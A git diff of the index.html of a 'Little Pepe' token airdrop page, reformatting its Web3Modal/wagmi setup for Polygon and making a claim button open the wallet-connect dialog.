--- a/index.html
+++ b/index.html
@@ -8,36 +8,34 @@
   <link rel="icon" href="logo.svg" type="image/svg+xml">
   <meta name="description" content=Little Pepe airdrop: connecting a wallet (MetaMask/Trust/OKX), без транзакций и без approve."/>
 	  <script type="module">
-    import { createWeb3Modal, defaultWagmiConfig } from "https://esm.sh/@web3modal/wagmi";
-    import { polygon } from "https://esm.sh/viem/chains";
+  import { createWeb3Modal, defaultWagmiConfig } from "https://esm.sh/@web3modal/wagmi";
+import { polygon } from "https://esm.sh/viem/chains";
 
-    // 1. Твой projectId
-    const projectId = "56edaed968d799280ffd685113d7f126";
+const projectId = "56edaed968d799280ffd685113d7f126";
+const chains = [polygon];
+const config = defaultWagmiConfig({ chains, projectId });
 
-    // 2. Chains
-    const chains = [polygon];
+const modal = createWeb3Modal({
+  wagmiConfig: config,
+  projectId,
+  chains,
+  themeMode: "dark",
+  themeVariables: {
+    "--w3m-accent-color": "#4caf50",
+    "--w3m-background-color": "#121212"
+  }
+});
 
-    // 3. Wagmi config
-    const config = defaultWagmiConfig({ chains, projectId });
+window.onload = () => {
+  const claimBtn = document.getElementById("claimBtn");
+  
+  claimBtn.disabled = false; // делаем кнопку активной сразу
+  claimBtn.addEventListener("click", async () => {
+    // открываем меню выбора кошелька
+    await modal.open();
+  });
+};
 
-    // 4. Init Web3Modal
-    const modal = createWeb3Modal({
-      wagmiConfig: config,
-      projectId,
-      chains,
-      themeMode: "dark",
-      themeVariables: {
-        "--w3m-accent-color": "#4caf50",
-        "--w3m-background-color": "#121212"
-      }
-    });
-
-    // 5. Открытие модалки
-    window.onload = () => {
-      document.getElementById("connect").onclick = () => {
-        modal.open();
-      };
-    };
   </script>
 </head>
 <body>
